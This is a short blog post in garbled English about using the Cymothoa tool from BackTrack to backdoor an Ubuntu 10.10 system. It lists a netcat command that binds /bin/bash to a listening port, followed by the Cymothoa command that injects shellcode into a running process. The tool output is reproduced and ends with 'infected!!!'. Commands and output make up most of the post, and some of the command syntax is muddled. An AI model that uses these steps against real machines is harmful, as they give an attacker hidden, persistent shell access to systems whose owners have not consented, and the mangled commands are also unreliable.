Senin, 30 Januari 2012

CYMOTHOA of Backtrack to ubuntu 10.10


picture the above is attacker point for entered into the system target. by using:
#nc -l -v -p 2222 -e > cy /bin/bash
listening on [any] 2222 ... inverse host lookup failed: Unknown server error : Connection timed out
connect to [] from (UNKNOWN) [] 56867

this is yield from attacker in ubuntu used in backtrack
 already infected shell with writing order :
./cymothoa -p 1491 -s 0 13
[+] attaching to process 1491

 register info:
 eax value: 0xfffffdfc   ebx value: 0x931c028
 esp value: 0xbfae2da0   eip value: 0x6ea416

[+] new esp: 0xbfae2d9c
[+] injecting code into 0x005b0000
[+] copy general purpose registers
[+] detaching from 1491

[+] infected!!!

image display bellow:

editing from posting before